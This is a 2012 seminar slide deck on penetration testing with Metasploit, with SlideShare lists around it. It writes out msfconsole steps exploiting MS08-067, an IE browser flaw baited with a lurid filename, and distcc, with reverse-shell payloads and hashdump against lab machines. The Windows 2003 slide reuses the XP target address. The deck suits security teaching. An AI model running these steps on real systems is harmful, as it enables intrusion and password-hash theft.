M.Syarifudin, ST, OSCP, OSWP , profile picture
Uploaded byM.Syarifudin, ST, OSCP, OSWP
24,816 views

Pentest with Metasploit

This document summarizes a presentation about penetration testing with Metasploit. It introduces penetration testing and why organizations use it. It then discusses the basics of Metasploit, including interfaces like MSFconsole. Key concepts in Metasploit like exploits, payloads, and Meterpreter are explained. The presentation demonstrates Metasploit against different operating systems like Windows XP, Windows 7, and Ubuntu. It shows how to find and use appropriate exploits and payloads to gain remote access and post-exploitation activities.

Embed presentation

Downloaded 1,010 times
penetrationtesting withmetasploit Presented by Syarif ! Seminar IT Security Safe The System Sumedang, April 29 2012 STMIK Sumedang
Agenda • Why & What’s Penetration Testing ( Pentest ) • << back|track Overview • Metasploit Basics & Meterpreter • DEMO :)
Whoami • geek & Pentester • infosec trouble maker • InfoSec enthusiast • CyberCrime investigator • Lecture & Engineer
Why Pentest ? • Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1) • Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
What’s Penetration Testing • A method to evaluate the security of computer system / network • Practice ( attacking ) an IT System like a ‘hacker’ does • Find security holes ( weaknesses ) • Bypass security mechanism • Compromise an organization’s IT system security Must have permission from IT system owner ! illegal activity put you in Jail
Ethics • Think before act • Don’t be stupid • Don’t be malicious
Pentest Phases Vulnerability Analysis Information Gathering Exploitation Post Exploitation Reporting
<< back|track overview • Let’s Watch theVideo :)
<< back|track overview • . The Most Advanced Linux Security Distribution Open Source & Always be Developed for Security Professional Real World Pentesting Tools
<< back|track overview
<< back|track overview
What’s • Not just a tool, but an entire framework *1) • an Open source platform for writing security tools and exploits *2) • Easily build attack vectors to add its exploits, payloads, encoders, • Create and execute more advanced attack • Ruby based
Metasploit interfaces • MSFconsole • MSFcli • msfweb, msfgui ( discontinued ) • Metasploit Pro, Metasploit Express • Armitage
MSFconsole
MSFcli
Metasploit Terminology • Exploit : code that allow a pentester take some advantages of a flaw within system,application, or service *1) • Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1) • Shellcode : a set of instructions used as payload when exploitation occurs *1) • Module : a software that can be used by metasploit *1) • Listener : a component for waiting an incoming connection *1)
How does exploitation works attacker exploit + payload vulnerable server 1 exploit run , then payload run 2 3 Upload / Download data
Traditional PentestVs Metasploit Public Exploit Gathering Change offsets Replace ShellCode Load Metasploit Choose the target OS Use exploit SET Payload Execute Traditional Pentest Metasploit for Pentest
Meterpreter • as a payload after vulnerability is exploited *1) • Improve the post exploitation
Meterpreter Exploiting a vulnerability Select a meterpreter as a payload meterpreter shell
Meterpreter command
Meterpreter command
Meterpreter command
Meterpreter command
Meterpreter command
Pentest Scenario attacker vulnerable OS onVMware * : Ubuntu 8.04 metasploitable *
OS in the Lab • BackTrack 5 R 2 • IP address : 172.16.240.143 • Windows Xp SP 2 • IP address : 172.16.240.129 • Windows 2003 Server • IP address : 172.16.240.141 • Windows 7 • IP address : 172.16.240.142 • Ubuntu Linux 8.04 ( Metasploitable ) • IP address : 172.16.240.144
Windows XP Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 • msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
Windows XP Post Exploitation • session -i 1 • meterpreter > getsystem -h • getuid • hashdump
Windows 2003 Server Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 • msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
Windows 7 Exploitation • msf > use exploit/windows/browser/ms11_003_ie_css_import • msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms11_003_ie_css_import) > show options • msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143 • msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 • msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi • msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143 • msf exploit(ms11_003_ie_css_import) > set LPORT 443 • msf exploit(ms11_003_ie_css_import) > exploit Just wait until the victim open the url http://172.16.240.143:80/miyabi-naked.avi
Windows 7 Exploitation • msf exploit(ms11_003_ie_css_import) > sessions -l • msf exploit(ms11_003_ie_css_import) > sessions -i 1 • meterpreter > sysinfo • meterpreter > shell
Ubuntu 8.04 Metasploitable Exploitation • search distcc • use exploit/unix/misc/distcc_exec • show payloads • set PAYLOAD cmd/unix/reverse • show options • set rhost 172.16.240.144 • set lhost 172.16.240.143 • exploit
Any Question ? Contact me • website : http://fl3x.us • twitter : @fl3xu5
Greet & Thanks To • BackTrack Linux • Metasploit Team ( HD Moore & rapid7 ) • Offensive Security / Metasploit Unleashed • David Kennedy • Georgia Weidman
References ! ! • 1. Metasploit The Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni • 2. http://www.metasploit.com • 3. http://www.offensive-security.com/metasploit- unleashed/Main_Page • 4. http://www.pentest-standard.org/index.php/ PTES_Technical_Guidelines

More Related Content

PDF
ATT&CKing Your Adversaries - Operationalizing cyber intelligence in your own ...
byJamieWilliams130
 
PPTX
Metasploit
byhenelpj
 
PPTX
Introduction To Exploitation & Metasploit
byRaghav Bisht
 
PPTX
Metasploit framwork
byDeepanshu Gajbhiye
 
PDF
Hunting for Credentials Dumping in Windows Environment
byTeymur Kheirkhabarov
 
PPTX
Malware Static Analysis
byHossein Yavari
 
PDF
Metaploit
byAjinkya Pathak
 
PDF
Windows Threat Hunting
byGIBIN JOHN
 
ATT&CKing Your Adversaries - Operationalizing cyber intelligence in your own ...
byJamieWilliams130
 
Metasploit
byhenelpj
 
Introduction To Exploitation & Metasploit
byRaghav Bisht
 
Metasploit framwork
byDeepanshu Gajbhiye
 
Hunting for Credentials Dumping in Windows Environment
byTeymur Kheirkhabarov
 
Malware Static Analysis
byHossein Yavari
 
Metaploit
byAjinkya Pathak
 
Windows Threat Hunting
byGIBIN JOHN
 

What's hot

PPTX
Metasploit framework in Network Security
byAshok Reddy Medikonda
 
PPTX
Metasploit
byLalith Sai
 
PDF
Fantastic Red Team Attacks and How to Find Them
byRoss Wolf
 
PPTX
Introduction to Metasploit
byGTU
 
PPTX
Penetration testing reporting and methodology
byRashad Aliyev
 
PDF
Penetration Testing Execution Phases
byNasir Bhutta
 
PPTX
Catch Me If You Can: PowerShell Red vs Blue
byWill Schroeder
 
PPTX
Cyber Threat Hunting Workshop
byDigit Oktavianto
 
PPTX
Vulnerability assessment and penetration testing
byAbu Sadat Mohammed Yasin
 
PPTX
Threat hunting for Beginners
bySKMohamedKasim
 
PDF
Derbycon - The Unintended Risks of Trusting Active Directory
byWill Schroeder
 
PDF
PHDays 2018 Threat Hunting Hands-On Lab
byTeymur Kheirkhabarov
 
PPTX
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
bySam Bowne
 
PPTX
Adversary Emulation using CALDERA
byErik Van Buggenhout
 
PDF
How to Hunt for Lateral Movement on Your Network
bySqrrl
 
PPTX
WTF is Penetration Testing v.2
byScott Sutherland
 
PDF
Red Team Framework
by👀 Joe Gray
 
PDF
Threat Modelling - It's not just for developers
byMITRE ATT&CK
 
PPTX
Bsides 2019 - Intelligent Threat Hunting
byDhruv Majumdar
 
PPTX
Metasploit
byInstitute of Information Security (IIS)
 
Metasploit framework in Network Security
byAshok Reddy Medikonda
 
Metasploit
byLalith Sai
 
Fantastic Red Team Attacks and How to Find Them
byRoss Wolf
 
Introduction to Metasploit
byGTU
 
Penetration testing reporting and methodology
byRashad Aliyev
 
Penetration Testing Execution Phases
byNasir Bhutta
 
Catch Me If You Can: PowerShell Red vs Blue
byWill Schroeder
 
Cyber Threat Hunting Workshop
byDigit Oktavianto
 
Vulnerability assessment and penetration testing
byAbu Sadat Mohammed Yasin
 
Threat hunting for Beginners
bySKMohamedKasim
 
Derbycon - The Unintended Risks of Trusting Active Directory
byWill Schroeder
 
PHDays 2018 Threat Hunting Hands-On Lab
byTeymur Kheirkhabarov
 
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
bySam Bowne
 
Adversary Emulation using CALDERA
byErik Van Buggenhout
 
How to Hunt for Lateral Movement on Your Network
bySqrrl
 
WTF is Penetration Testing v.2
byScott Sutherland
 
Red Team Framework
by👀 Joe Gray
 
Threat Modelling - It's not just for developers
byMITRE ATT&CK
 
Bsides 2019 - Intelligent Threat Hunting
byDhruv Majumdar
 
Metasploit
byInstitute of Information Security (IIS)
 

Viewers also liked

PDF
Social Network Security & Backdooring email
byM.Syarifudin, ST, OSCP, OSWP
 
PDF
Wireless LAN Security-Bimtek Kominfo
byM.Syarifudin, ST, OSCP, OSWP
 
PDF
iCrOSS 2013_Pentest
byM.Syarifudin, ST, OSCP, OSWP
 
PDF
IPTV Security
byM.Syarifudin, ST, OSCP, OSWP
 
PDF
My pwk & oscp journey
byM.Syarifudin, ST, OSCP, OSWP
 
PDF
Prepare Yourself to Become Infosec Professional
byM.Syarifudin, ST, OSCP, OSWP
 
PDF
Information gath
byM.Syarifudin, ST, OSCP, OSWP
 
Social Network Security & Backdooring email
byM.Syarifudin, ST, OSCP, OSWP
 
Wireless LAN Security-Bimtek Kominfo
byM.Syarifudin, ST, OSCP, OSWP
 
iCrOSS 2013_Pentest
byM.Syarifudin, ST, OSCP, OSWP
 
IPTV Security
byM.Syarifudin, ST, OSCP, OSWP
 
My pwk & oscp journey
byM.Syarifudin, ST, OSCP, OSWP
 
Prepare Yourself to Become Infosec Professional
byM.Syarifudin, ST, OSCP, OSWP
 
Information gath
byM.Syarifudin, ST, OSCP, OSWP
 

Similar to Pentest with Metasploit

PDF
Pen-Testing with Metasploit
byMohammed Danish Amber
 
PDF
Metasploit Computer security testing tool
bymedoelkang600
 
PDF
Metasploit: Pwnage and Ponies
byTrowalts
 
PPTX
Pentesting with linux
byHammad Ahmed Khawaja
 
PDF
Metasploit for Penetration Testing: Beginner Class
byGeorgia Weidman
 
PPTX
Introduction to metasploit
byGTU
 
PPTX
Introduction To Ethical Hacking
byRaghav Bisht
 
PDF
24 33 -_metasploit
bywozgeass
 
PDF
Pentesting with Metasploit
byPrakashchand Suthar
 
PPTX
Client side exploits
bynickyt8
 
PPTX
Finalppt metasploit
bydevilback
 
PDF
Metasploit Humla for Beginner
byn|u - The Open Security Community
 
PDF
01_Metasploit - The Elixir of Network Security
byHarish Chaudhary
 
PPTX
Metasploit
byRaghunath G
 
PDF
The Metasploit Framework Companion Guide
byfynboytinny
 
PDF
Cheatsheet: Metasploit
byKasper de Waard
 
DOCX
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
bySyed Ubaid Ali Jafri
 
PDF
SSMF (Security Scope Metasploit Framework) - Course Syllabus
bySecurity Scope
 
PPTX
Windows xp compromise and remedies
byBikrant Gautam
 
PDF
Compromising windows 8 with metasploit’s exploit
byIOSR Journals
 
Pen-Testing with Metasploit
byMohammed Danish Amber
 
Metasploit Computer security testing tool
bymedoelkang600
 
Metasploit: Pwnage and Ponies
byTrowalts
 
Pentesting with linux
byHammad Ahmed Khawaja
 
Metasploit for Penetration Testing: Beginner Class
byGeorgia Weidman
 
Introduction to metasploit
byGTU
 
Introduction To Ethical Hacking
byRaghav Bisht
 
24 33 -_metasploit
bywozgeass
 
Pentesting with Metasploit
byPrakashchand Suthar
 
Client side exploits
bynickyt8
 
Finalppt metasploit
bydevilback
 
Metasploit Humla for Beginner
byn|u - The Open Security Community
 
01_Metasploit - The Elixir of Network Security
byHarish Chaudhary
 
Metasploit
byRaghunath G
 
The Metasploit Framework Companion Guide
byfynboytinny
 
Cheatsheet: Metasploit
byKasper de Waard
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
bySyed Ubaid Ali Jafri
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
bySecurity Scope
 
Windows xp compromise and remedies
byBikrant Gautam
 
Compromising windows 8 with metasploit’s exploit
byIOSR Journals
 

Recently uploaded

PDF
"DISC as GPS for team leaders: how to lead a team from storming to performing...
byFwdays
 
PDF
[BDD 2025 - Mobile Development] Mobile Engineer and Software Engineer: Are we...
bywintari3
 
PDF
PCCC25(設立25年記念PCクラスタシンポジウム):エヌビディア合同会社 テーマ2「NVIDIA BlueField-4 DPU」
byPC Cluster Consortium
 
PDF
Parallel Computing BCS702 Module notes of the vtu college 7th sem 4.pdf
byMatheshVishnu
 
PPTX
Leon Brands - Intro to GPU Occlusion (Graphics Programming Conference 2024)
byleonbrands1998
 
PDF
[BDD 2025 - Full-Stack Development] PHP in AI Age: The Laravel Way. (Rizqy Hi...
byWintari Yasmin
 
PPTX
The power of Slack and MuleSoft | Bangalore MuleSoft Meetup #60
byshyamraj55
 
PDF
Agentic Intro and Hands-on: Build your first Coded Agent
byUiPathCommunity
 
PDF
Dev Dives: Build smarter agents with UiPath Agent Builder
byUiPathCommunity
 
PDF
Mulesoft Meetup Online Portuguese: MCP e IA
byPedro Baroni
 
PDF
Open Source Post-Quantum Cryptography - Matt Caswell
byAll Things Open
 
PPTX
Connecting the unconnectable: Exploring LoRaWAN for IoT
byasasiraarthur
 
PDF
So You Want to Work at Google | DevFest Seattle 2025
byMargaret Maynard-Reid
 
PDF
[BDD 2025 - Full-Stack Development] The Modern Stack: Building Web & AI Appli...
byWintari Yasmin
 
PDF
The Necessity of Digital Forensics, the Digital Forensics Process & Laborator...
bychrstnpetwinchester
 
PDF
Lets Build a Serverless Function with Kiro
byChris Bingham
 
PDF
10 Best Automation QA Testing Software Tools in 2025.pdf
byRohitBhandari66
 
PPTX
UFCD 0797 - SISTEMAS OPERATIVOS_Unidade Completa.pptx
byscribddobruno
 
PDF
Cheryl Hung, Vibe Coding Auth Without Melting Down! isaqb Software Architectu...
byCheryl Hung
 
PDF
Cybersecurity Prevention and Detection: Unit 2
byVICTOR MAESTRE RAMIREZ
 
"DISC as GPS for team leaders: how to lead a team from storming to performing...
byFwdays
 
[BDD 2025 - Mobile Development] Mobile Engineer and Software Engineer: Are we...
bywintari3
 
PCCC25(設立25年記念PCクラスタシンポジウム):エヌビディア合同会社 テーマ2「NVIDIA BlueField-4 DPU」
byPC Cluster Consortium
 
Parallel Computing BCS702 Module notes of the vtu college 7th sem 4.pdf
byMatheshVishnu
 
Leon Brands - Intro to GPU Occlusion (Graphics Programming Conference 2024)
byleonbrands1998
 
[BDD 2025 - Full-Stack Development] PHP in AI Age: The Laravel Way. (Rizqy Hi...
byWintari Yasmin
 
The power of Slack and MuleSoft | Bangalore MuleSoft Meetup #60
byshyamraj55
 
Agentic Intro and Hands-on: Build your first Coded Agent
byUiPathCommunity
 
Dev Dives: Build smarter agents with UiPath Agent Builder
byUiPathCommunity
 
Mulesoft Meetup Online Portuguese: MCP e IA
byPedro Baroni
 
Open Source Post-Quantum Cryptography - Matt Caswell
byAll Things Open
 
Connecting the unconnectable: Exploring LoRaWAN for IoT
byasasiraarthur
 
So You Want to Work at Google | DevFest Seattle 2025
byMargaret Maynard-Reid
 
[BDD 2025 - Full-Stack Development] The Modern Stack: Building Web & AI Appli...
byWintari Yasmin
 
The Necessity of Digital Forensics, the Digital Forensics Process & Laborator...
bychrstnpetwinchester
 
Lets Build a Serverless Function with Kiro
byChris Bingham
 
10 Best Automation QA Testing Software Tools in 2025.pdf
byRohitBhandari66
 
UFCD 0797 - SISTEMAS OPERATIVOS_Unidade Completa.pptx
byscribddobruno
 
Cheryl Hung, Vibe Coding Auth Without Melting Down! isaqb Software Architectu...
byCheryl Hung
 
Cybersecurity Prevention and Detection: Unit 2
byVICTOR MAESTRE RAMIREZ
 
In this document
Powered by AI

Overview of penetration testing and the presenter’s background in InfoSec.

Discusses the necessity and definition of penetration testing as a method to uncover security weaknesses.

Emphasizes the importance of ethical practices in penetration testing.

Outlines the key phases involved in executing a penetration test.

Introduces Backtrack as an advanced Linux distribution for security professionals.

Explains Metasploit as an open-source framework for security tools, including its interfaces.

Describes key Metasploit terminology including exploits, payloads, and modules.

Explains the exploitation process and compares traditional pentesting with using Metasploit.

Details how Meterpreter acts as an advanced payload for post-exploitation activities.

Outlines scenarios for exploitation on various operating systems within the testing environment.

Walkthrough of exploitation steps on Windows XP including post-exploitation activities.

Details the exploitation process for Windows 2003 Server using similar methods as Windows XP.

Presents detailed exploitation steps for Windows 7 and post-exploitation verification.

Describes the exploitation process for the Metasploitable Ubuntu environment.

Wrap-up of the seminar, offering contact information and acknowledgments of contributors.

Pentest with Metasploit

  • 1.
    penetrationtesting withmetasploit Presented by Syarif ! SeminarIT Security Safe The System Sumedang, April 29 2012 STMIK Sumedang
  • 2.
    Agenda • Why &What’s Penetration Testing ( Pentest ) • << back|track Overview • Metasploit Basics & Meterpreter • DEMO :)
  • 3.
    Whoami • geek &Pentester • infosec trouble maker • InfoSec enthusiast • CyberCrime investigator • Lecture & Engineer
  • 4.
    Why Pentest ? •Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1) • Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
  • 5.
    What’s Penetration Testing •A method to evaluate the security of computer system / network • Practice ( attacking ) an IT System like a ‘hacker’ does • Find security holes ( weaknesses ) • Bypass security mechanism • Compromise an organization’s IT system security Must have permission from IT system owner ! illegal activity put you in Jail
  • 6.
    Ethics • Think beforeact • Don’t be stupid • Don’t be malicious
  • 7.
    Pentest Phases Vulnerability Analysis InformationGathering Exploitation Post Exploitation Reporting
  • 8.
    << back|track overview •Let’s Watch theVideo :)
  • 9.
    << back|track overview •. The Most Advanced Linux Security Distribution Open Source & Always be Developed for Security Professional Real World Pentesting Tools
  • 10.
  • 11.
  • 12.
    What’s • Not justa tool, but an entire framework *1) • an Open source platform for writing security tools and exploits *2) • Easily build attack vectors to add its exploits, payloads, encoders, • Create and execute more advanced attack • Ruby based
  • 13.
    Metasploit interfaces • MSFconsole •MSFcli • msfweb, msfgui ( discontinued ) • Metasploit Pro, Metasploit Express • Armitage
  • 14.
  • 15.
  • 16.
    Metasploit Terminology • Exploit: code that allow a pentester take some advantages of a flaw within system,application, or service *1) • Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1) • Shellcode : a set of instructions used as payload when exploitation occurs *1) • Module : a software that can be used by metasploit *1) • Listener : a component for waiting an incoming connection *1)
  • 17.
    How does exploitationworks attacker exploit + payload vulnerable server 1 exploit run , then payload run 2 3 Upload / Download data
  • 18.
    Traditional PentestVs Metasploit PublicExploit Gathering Change offsets Replace ShellCode Load Metasploit Choose the target OS Use exploit SET Payload Execute Traditional Pentest Metasploit for Pentest
  • 19.
    Meterpreter • as apayload after vulnerability is exploited *1) • Improve the post exploitation
  • 20.
    Meterpreter Exploiting a vulnerability Selecta meterpreter as a payload meterpreter shell
  • 21.
  • 22.
  • 23.
  • 24.
  • 25.
  • 26.
    Pentest Scenario attacker vulnerableOS onVMware * : Ubuntu 8.04 metasploitable *
  • 27.
    OS in theLab • BackTrack 5 R 2 • IP address : 172.16.240.143 • Windows Xp SP 2 • IP address : 172.16.240.129 • Windows 2003 Server • IP address : 172.16.240.141 • Windows 7 • IP address : 172.16.240.142 • Ubuntu Linux 8.04 ( Metasploitable ) • IP address : 172.16.240.144
  • 28.
    Windows XP Exploitation •msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 • msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
  • 29.
    Windows XP PostExploitation • session -i 1 • meterpreter > getsystem -h • getuid • hashdump
  • 30.
    Windows 2003 ServerExploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 • msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
  • 31.
    Windows 7 Exploitation •msf > use exploit/windows/browser/ms11_003_ie_css_import • msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms11_003_ie_css_import) > show options • msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143 • msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 • msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi • msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143 • msf exploit(ms11_003_ie_css_import) > set LPORT 443 • msf exploit(ms11_003_ie_css_import) > exploit Just wait until the victim open the url http://172.16.240.143:80/miyabi-naked.avi
  • 32.
    Windows 7 Exploitation •msf exploit(ms11_003_ie_css_import) > sessions -l • msf exploit(ms11_003_ie_css_import) > sessions -i 1 • meterpreter > sysinfo • meterpreter > shell
  • 33.
    Ubuntu 8.04 MetasploitableExploitation • search distcc • use exploit/unix/misc/distcc_exec • show payloads • set PAYLOAD cmd/unix/reverse • show options • set rhost 172.16.240.144 • set lhost 172.16.240.143 • exploit
  • 34.
    Any Question ? Contactme • website : http://fl3x.us • twitter : @fl3xu5
  • 35.
    Greet & ThanksTo • BackTrack Linux • Metasploit Team ( HD Moore & rapid7 ) • Offensive Security / Metasploit Unleashed • David Kennedy • Georgia Weidman
  • 36.
    References ! ! • 1. MetasploitThe Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni • 2. http://www.metasploit.com • 3. http://www.offensive-security.com/metasploit- unleashed/Main_Page • 4. http://www.pentest-standard.org/index.php/ PTES_Technical_Guidelines